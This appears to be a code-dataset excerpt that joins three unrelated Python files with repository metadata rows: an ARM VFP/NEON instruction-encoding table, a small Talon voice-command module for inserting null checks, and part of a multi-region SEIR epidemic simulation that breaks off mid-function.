('VORN<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VORR<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 0, 1, imm4),
('VORR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VPADAL<c>.<dt>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 0, op, Q, M, 0, Vm),
('VPADD<c>.<dt>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 1, Vm),
('VPADD<c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VPADDL<c>.<dt>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 1, 0, op, Q, M, 0, Vm),
('VP<op><c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 0, N, Q, M, op, Vm),
('VP<op><c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('VPOP <list>', 1, 1, 1, 0, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPOP <list>', 1, 1, 1, 0, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VPUSH<c> <list>', 1, 1, 1, 0, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPUSH<c> <list>', 1, 1, 1, 0, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VQABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 0, Q, M, 0, Vm),
('VQADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 0, 0, N, Q, M, 1, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, op, 1, N, 0, M, 0, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 1, 1, N, 1, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 0, N, 1, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 0, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 1, 1, N, 1, M, 0, Vm),
('VQMOV{U}N<c>.<type><size> <Dd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, op2, M, 0, Vm),
('VQNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 1, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 1, M, 0, Vm),
('VQRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 1, Vm),
('VQRSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, op, 0, 1, M, 1, Vm),
('VQSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 1, Vm),
('VQSHL{U}<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 1, op, L, Q, M, 1, Vm),
('VQSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, op, 0, 0, M, 1, Vm),
('VQSUB<c>.<type><size> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 0, N, Q, M, 1, Vm),
('VRADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VRECPE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 0, Q, M, 0, Vm),
('VRECPS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VREV<n><c>.<size> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 0, op2, Q, M, 0, Vm),
('VRHADD<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 0, 1, N, Q, M, 0, Vm),
('VRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 0, Vm),
('VRSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 1, 0, L, Q, M, 1, Vm),
('VRSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 1, M, 1, Vm),
('VRSQRTE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 1, Q, M, 0, Vm),
('VRSQRTS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VRSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 1, 1, L, Q, M, 1, Vm),
('VRSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSHL<c>.I<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 0, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 1, 0, 0, M, 0, Vm),
('VSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 0, 0, L, Q, M, 1, Vm),
('VSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 0, M, 1, Vm),
('VSLI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSQRT<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 0, 1, L, Q, M, 1, Vm),
('VSRI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 0, L, Q, M, 1, Vm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VST3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VSTM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSTR<c> <Dd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTR<c> <Sd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSUB<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VSUB<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VSUB<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSUBL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 0, 1, op, N, 0, M, 0, Vm),
('VSWP<c> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 0, Q, M, 0, Vm),
('V<op><c>.8 <Dd>,<list>,<Dm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, Vn, Vd, 1, 0, len_, N, op, M, 0, Vm),
('VTRN<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 1, Q, M, 0, Vm),
('VTST<c>.<size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
('VUZP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 1, 0, Q, M, 0, Vm),
('VZIP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 1, 1, Q, M, 0, Vm),
]
if __name__ == '__main__':
    # Self-check: every instruction-encoding row must describe exactly
    # 32 bits.  A literal 0/1 entry occupies a single bit, while bit-field
    # objects report their width via .bitsize.  Rows that do not total 32
    # bits are printed for inspection.
    for entry in VFP_ARMv7 + VFP_Thumb:
        mnemonic = entry[0]
        widths = [1 if type(field) == int else field.bitsize for field in entry[1:]]
        total = sum(widths)
        if total != 32:
            print(mnemonic, widths, total)
| 101.136709 | 132 | 0.395329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10,708 | 0.268042 |
33a5d6a0778311e0740b6ce7a927d2f68fa7baf5 | 380 | py | Python | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | 5 | 2020-02-16T13:39:10.000Z | 2020-02-19T19:29:56.000Z | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | null | null | null | lang/tags/data_null.py | ghouston/knausj_talon | 098bb3e89261b19f4b2eda0ca0696f398c50e931 | [
"MIT"
] | 2 | 2020-02-19T15:10:44.000Z | 2020-02-19T16:55:38.000Z | from talon import Context, Module
# Talon context/module handles for this file's declarations.
ctx = Context()
mod = Module()
# Tag that other Talon contexts activate to enable the null-related commands.
mod.tag("code_data_null", desc="Tag for enabling commands relating to null")
@mod.action_class
class Actions:
    # Talon action declarations: the empty bodies (docstring only) are
    # intentional.  Per-language implementations are supplied by contexts
    # that activate the "code_data_null" tag.  Talon actions take no `self`.
    def code_insert_null():
        """Inserts null"""
    def code_insert_is_null():
        """Inserts check for null"""
    def code_insert_is_not_null():
        """Inserts check for non-null"""
| 20 | 76 | 0.665789 | 215 | 0.565789 | 0 | 0 | 233 | 0.613158 | 0 | 0 | 138 | 0.363158 |
33a71005f3058f76ab1ae55200dbe62d59fe1b2f | 17,810 | py | Python | epidemiology_model.py | sei-international/epidemic-macro-model | 9bb4089c1ed031376304d3024b5593525132d0a7 | [
"Apache-2.0"
] | 4 | 2021-12-17T18:54:49.000Z | 2022-01-03T20:52:17.000Z | epidemiology_model.py | sei-international/epidemic-macro-model | 9bb4089c1ed031376304d3024b5593525132d0a7 | [
"Apache-2.0"
] | null | null | null | epidemiology_model.py | sei-international/epidemic-macro-model | 9bb4089c1ed031376304d3024b5593525132d0a7 | [
"Apache-2.0"
] | null | null | null | from numpy import array as np_array, zeros as np_zeros, sum as np_sum, empty as np_empty, \
amax as np_amax, interp as np_interp, ones as np_ones, tile as np_tile, isnan as np_isnan
import yaml
from seir_model import SEIR_matrix
from common import Window, get_datetime, timesteps_between_dates, get_datetime_array, timesteps_over_timedelta_weeks
from sys import exit
def epidemiology_model():
    """
    Run the multi-region, multi-variant SEIR epidemic simulation.

    Reads ``common_params.yaml``, ``regions.yaml`` and ``seir_params.yaml``
    from the working directory, builds one ``SEIR_matrix`` model per
    (region, variant) pair, and advances the simulation one timestep at a
    time from the COVID start date to the end date, applying the configured
    public-health windows (case isolation, isolate-at-risk, test and trace,
    social distancing, international travel restrictions) and the
    vaccination schedule.

    Returns:
        Tuple of (nvars, seir_params_multivar, nregions, regions,
        start_time, end_time, epi_datetime_array, susceptible_over_time,
        exposed_over_time, infective_over_time, recovered_over_time,
        vaccinated_over_time, deaths_over_time, deaths_reinf_over_time,
        reexposed_over_time, reinfective_over_time, rerecovered_over_time,
        hospitalization_index).  The ``*_over_time`` arrays are indexed
        ``[region, timestep, variant]``.
    """
    # --- Load configuration -------------------------------------------------
    with open(r'common_params.yaml') as file:
        common_params = yaml.full_load(file)
    with open(r'regions.yaml') as file:
        regions = yaml.full_load(file)
    with open(r'seir_params.yaml') as file:
        seir_params_multivar = yaml.full_load(file)
    nvars=len(seir_params_multivar) # (var=1 is baseline model, var=2 is delta variant)
    nregions = len(regions)

    # --- Build one SEIR model per (region, variant) -------------------------
    epi = []
    intl_visitors = []
    between_region_mobility_rate = []
    between_locality_mobility_rate = []
    beds_per_1000 = []
    baseline_hosp = []
    for rgn in regions:
        beds_per_1000.append(rgn['initial']['beds per 1000'])
        baseline_hosp.append(rgn['initial']['population'] * rgn['initial']['beds per 1000']/1000)
        epivar=[]
        for var in seir_params_multivar:
            epivar.append(SEIR_matrix(rgn, var, common_params))
        if 'international travel' in rgn:
            intl_visitors.append(rgn['international travel']['daily arrivals'] * rgn['international travel']['duration of stay'])
        else:
            intl_visitors.append(0.0)
        between_locality_mobility_rate.append(rgn['between locality mobility rate'])
        between_region_mobility_rate.append(rgn['between region mobility rate'])
        epi.append(epivar) # epi is indexed [region][variant] (one variant list appended per region)

    # Sanity check: the variants' shares of global infections must sum to ~1
    # at every timestep.
    proportion_total = [e.proportion_global_infected for e in epi[0]]
    test1=np_sum(proportion_total,axis=0)
    if any(test1<0.999) or any(test1>1.001):
        print('Error test1: aborted')
        print('proportions of global infections across variants do not sum to 1')
        exit()

    # --- Time axis ----------------------------------------------------------
    start_datetime = get_datetime(common_params['time']['COVID start'])
    start_time = timesteps_between_dates(common_params['time']['start date'], common_params['time']['COVID start'])
    end_time = timesteps_between_dates(common_params['time']['start date'], common_params['time']['end date'])
    epi_datetime_array = get_datetime_array(common_params['time']['COVID start'], common_params['time']['end date'])
    ntimesteps = end_time - start_time

    # All the epidemiological regional models will give the same values for these parameters
    epi_invisible_fraction = epi[0][0].invisible_fraction_1stinfection
    total_population=0
    # BUGFIX: sum the initial population over *regions*.  The original loop
    # ran over range(len(epi[:][0])) — i.e. the number of variants — while
    # indexing regions, which miscounts (or raises IndexError) whenever
    # nvars != nregions.
    for i in range(0, nregions):
        total_population += epi[i][0].N
    normal_bed_occupancy_fraction = common_params['bed occupancy']['normal']
    max_reduction_in_normal_bed_occupancy = common_params['bed occupancy']['max reduction']
    if 'vaccinate at risk first' in common_params['vaccination']:
        vaccinate_at_risk = common_params['vaccination']['vaccinate at risk first']
    else:
        vaccinate_at_risk = False
    avoid_elective_operations= common_params['avoid elective operations']

    # Global infection rate per person, linearly interpolated between the
    # configured trajectory points.
    global_infection_points = common_params['global infection rate']
    global_infection_npoints = len(global_infection_points)
    global_infection_traj_start = global_infection_points[0][0]
    if get_datetime(global_infection_traj_start) > start_datetime:
        global_infection_traj_start = common_params['time']['COVID start']
    global_infection_traj_timesteps_array = np_array(range(0,timesteps_between_dates(global_infection_traj_start, common_params['time']['end date']) + 1))
    global_infection_ts = np_empty(global_infection_npoints)
    global_infection_val = np_empty(global_infection_npoints)
    for i in range(0,global_infection_npoints):
        global_infection_ts[i] = timesteps_between_dates(global_infection_traj_start, global_infection_points[i][0])
        global_infection_val[i] = global_infection_points[i][1]/1000 # Values are entered per 1000
    global_infection_rate = np_interp(global_infection_traj_timesteps_array, global_infection_ts, global_infection_val)
    # Truncate at start as necessary
    ntrunc = timesteps_between_dates(global_infection_traj_start, common_params['time']['COVID start'])
    global_infection_rate = global_infection_rate[ntrunc:]

    # Maximum vaccination rate, shifted by the time-to-efficacy delay and
    # linearly interpolated between the configured points.
    vaccination_points = common_params['vaccination']['maximum doses per day']
    vaccination_delay = timesteps_over_timedelta_weeks(common_params['vaccination']['time to efficacy'])
    vaccination_npoints = len(vaccination_points)
    vaccination_timesteps_array = np_array(range(0,timesteps_between_dates(common_params['time']['COVID start'], common_params['time']['end date']) + 1))
    vaccination_ts = np_empty(vaccination_npoints)
    vaccination_val = np_empty(vaccination_npoints)
    for i in range(0,vaccination_npoints):
        vaccination_ts[i] = timesteps_between_dates(common_params['time']['COVID start'], vaccination_points[i][0]) + vaccination_delay
        vaccination_val[i] = vaccination_points[i][1]
    vaccination_max_doses = np_interp(vaccination_timesteps_array, vaccination_ts, vaccination_val)

    # --- Public-health measure windows --------------------------------------
    # Each Window ramps its effectiveness up/down around a start/end day
    # measured relative to the COVID start date.
    isolate_symptomatic_cases_windows = []
    if 'isolate symptomatic cases' in common_params:
        for window in common_params['isolate symptomatic cases']:
            if window['apply']:
                isolate_symptomatic_cases_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
                                                                (get_datetime(window['end date']) - start_datetime).days,
                                                                window['ramp up for'],
                                                                window['ramp down for'],
                                                                (1 - epi_invisible_fraction) * window['fraction of cases isolated']))
    isolate_at_risk_windows = []
    if 'isolate at risk' in common_params:
        for window in common_params['isolate at risk']:
            if window['apply']:
                isolate_at_risk_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
                                                      (get_datetime(window['end date']) - start_datetime).days,
                                                      window['ramp up for'],
                                                      window['ramp down for'],
                                                      window['fraction of population isolated']))
    test_and_trace_windows = []
    if 'test and trace' in common_params:
        for window in common_params['test and trace']:
            if window['apply']:
                test_and_trace_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
                                                     (get_datetime(window['end date']) - start_datetime).days,
                                                     window['ramp up for'],
                                                     window['ramp down for'],
                                                     window['fraction of infectious cases isolated']))
    soc_dist_windows = []
    if 'social distance' in common_params:
        for window in common_params['social distance']:
            if window['apply']:
                soc_dist_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
                                               (get_datetime(window['end date']) - start_datetime).days,
                                               window['ramp up for'],
                                               window['ramp down for'],
                                               window['effectiveness']))
    travel_restrictions_windows = []
    if 'international travel restrictions' in common_params:
        for window in common_params['international travel restrictions']:
            if window['apply']:
                travel_restrictions_windows.append(Window((get_datetime(window['start date']) - start_datetime).days,
                                                          (get_datetime(window['end date']) - start_datetime).days,
                                                          window['ramp up for'],
                                                          window['ramp down for'],
                                                          window['effectiveness']))

    # --- Initialize values for indicator graphs -----------------------------
    Itot_allvars=np_zeros(nregions)
    comm_spread_frac_allvars = np_zeros((nregions, nvars))
    deaths = np_zeros((nregions, nvars))
    deaths_reinf = np_zeros((nregions, nvars))
    cumulative_cases = np_zeros((nregions, nvars))
    deaths_over_time = np_zeros((nregions, ntimesteps, nvars))
    new_deaths_over_time = np_zeros((nregions, ntimesteps, nvars))
    deaths_reinf_over_time = np_zeros((nregions, ntimesteps, nvars))
    recovered_over_time = np_zeros((nregions, ntimesteps, nvars))
    vaccinated_over_time = np_zeros((nregions, ntimesteps, nvars))
    rerecovered_over_time = np_zeros((nregions, ntimesteps, nvars))
    mortality_rate_over_time = np_zeros((nregions, ntimesteps, nvars))
    hospitalization_index_region = np_ones(nregions)
    hospitalization_index = np_ones(ntimesteps)
    mortality_rate = np_ones(ntimesteps)
    infective_over_time = np_zeros((nregions, ntimesteps, nvars))
    reinfective_over_time = np_zeros((nregions, ntimesteps, nvars))
    susceptible_over_time = np_zeros((nregions, ntimesteps, nvars))
    for j in range(0,nregions):
        susceptible_over_time[j,0,:] = [e.S for e in epi[j]]
    exposed_over_time = np_zeros((nregions, ntimesteps, nvars))
    for j in range(0,nregions):
        exposed_over_time[j,0,:] = [np_sum(e.E_nr) + np_sum(e.E_r) for e in epi[j]]
    reexposed_over_time = np_zeros((nregions, ntimesteps, nvars))
    for j in range(0,nregions):
        reexposed_over_time[j,0,:] = [np_sum(e.RE_nr) + np_sum(e.RE_r) for e in epi[j]]
    comm_spread_frac_over_time = np_zeros((nregions, ntimesteps, nvars))
    for j in range(0,nregions):
        comm_spread_frac_over_time[j,0,:] = [e.comm_spread_frac for e in epi[j]]

    # --- Main simulation loop ------------------------------------------------
    for i in range(0, ntimesteps):
        # Public health measures: sum the active windows' contributions today.
        PHA_social_distancing = 0
        for w in soc_dist_windows:
            PHA_social_distancing += w.window(i)
        PHA_travel_restrictions = 0
        for w in travel_restrictions_windows:
            PHA_travel_restrictions += w.window(i)
        PHA_isolate_visible_cases = 0
        for w in isolate_symptomatic_cases_windows:
            PHA_isolate_visible_cases += w.window(i)
        PHA_isolate_at_risk = 0
        for w in isolate_at_risk_windows:
            PHA_isolate_at_risk += w.window(i)
        PHA_isolate_infectious_cases = 0
        for w in test_and_trace_windows:
            PHA_isolate_infectious_cases += w.window(i)
        PHA_isolate_cases = max(PHA_isolate_visible_cases, PHA_isolate_infectious_cases)
        public_health_adjustment = (1 - PHA_social_distancing) * (1 - PHA_isolate_cases)

        # Beds and mortality
        if avoid_elective_operations:
            bed_occupancy_factor = (1 - PHA_social_distancing * max_reduction_in_normal_bed_occupancy)
        else:
            bed_occupancy_factor = 1
        bed_occupancy_fraction = bed_occupancy_factor * normal_bed_occupancy_fraction

        # Community spread
        for j in range(0, nregions):
            comm_spread_frac_allvars[j,:] = [e.comm_spread_frac for e in epi[j]]

        # Loop over variants
        for v in range(0,nvars):
            # Loop over regions
            for j in range(0, nregions):
                # International arrivals carrying this variant; travel
                # restrictions scale arrivals down, clamped at zero.
                # BUGFIX: was min(0, 1 - PHA_travel_restrictions), which made
                # international seeding always zero or negative.
                intl_infected_visitors = intl_visitors[j] * (epi[j][v].proportion_global_infected[i]*global_infection_rate[i]) * max(0, 1 - PHA_travel_restrictions)
                dom_infected_visitors = 0
                # Confirm current variant has been introduced already
                if epi_datetime_array[i] >= epi[j][v].start_time:
                    if nregions > 1:
                        for k in range(0, nregions):
                            if k != j:
                                dom_infected_visitors += epi[k][v].Itot_prev * between_region_mobility_rate[k]/(nregions - 1)
                    # Run the model for one time step
                    epi[j][v].update(total_population,
                                     dom_infected_visitors + intl_infected_visitors,
                                     between_locality_mobility_rate[j],
                                     public_health_adjustment,
                                     PHA_isolate_at_risk,
                                     bed_occupancy_fraction,
                                     beds_per_1000[j],
                                     vaccination_max_doses[i],
                                     vaccinate_at_risk,
                                     Itot_allvars[j],
                                     comm_spread_frac_allvars[j],
                                     nvars)
                # Update values for indicator graphs
                new_deaths_over_time[j,i,v] = epi[j][v].new_deaths + epi[j][v].new_deaths_reinf
                deaths[j,v] += epi[j][v].new_deaths
                deaths_reinf[j,v] += epi[j][v].new_deaths_reinf
                exposed_over_time[j,i,v] = np_sum(epi[j][v].E_nr) + np_sum(epi[j][v].E_r)
                reexposed_over_time[j,i,v] = np_sum(epi[j][v].RE_nr) + np_sum(epi[j][v].RE_r)
                infective_over_time[j,i,v] = epi[j][v].Itot
                reinfective_over_time[j,i,v] = epi[j][v].RItot
                deaths_over_time[j,i,v] = deaths[j,v]
                deaths_reinf_over_time[j,i,v] = deaths_reinf[j,v]
                vaccinated_over_time[j,i,v] = epi[j][v].vaccinated
                rerecovered_over_time[j,i,v] = epi[j][v].RR
                cumulative_cases[j,v] += (1 - epi[j][v].invisible_fraction_1stinfection) * (epi[j][v].I_nr[1] + epi[j][v].I_r[1]) + \
                    (1 - epi[j][v].invisible_fraction_reinfection) * (epi[j][v].RI_nr[1] + epi[j][v].RI_r[1])
                comm_spread_frac_over_time[j,i,v] = epi[j][v].comm_spread_frac
                mortality_rate_over_time[j,i,v] = epi[j][v].curr_mortality_rate

        # Calculate hospitalisation index across variants and track infected fraction across variants
        Itot_allvars=np_zeros(nregions) ## Breaks if one variant infects everyone
        hospitalized=np_zeros(nregions)
        for j in range(0, nregions):
            # Infected by regions
            for e in epi[j]:
                Itot_allvars[j]+= e.Itot_incl_reinf # add total infected for each variant in that region
                hosp_per_infective_1stinfections = (1 - e.invisible_fraction_1stinfection) * e.ave_fraction_of_visible_1stinfections_requiring_hospitalization
                hosp_per_infective_reinfections = (1 - e.invisible_fraction_reinfection) * e.ave_fraction_of_visible_reinfections_requiring_hospitalization
                hospitalized[j] += ( hosp_per_infective_1stinfections * np_sum(e.I_r + e.I_nr) + hosp_per_infective_reinfections * np_sum(e.RI_r + e.RI_nr) )
            hospitalization_index_region[j] = bed_occupancy_fraction + hospitalized[j] /baseline_hosp[j]
        hospitalization_index[i] = np_amax(hospitalization_index_region)
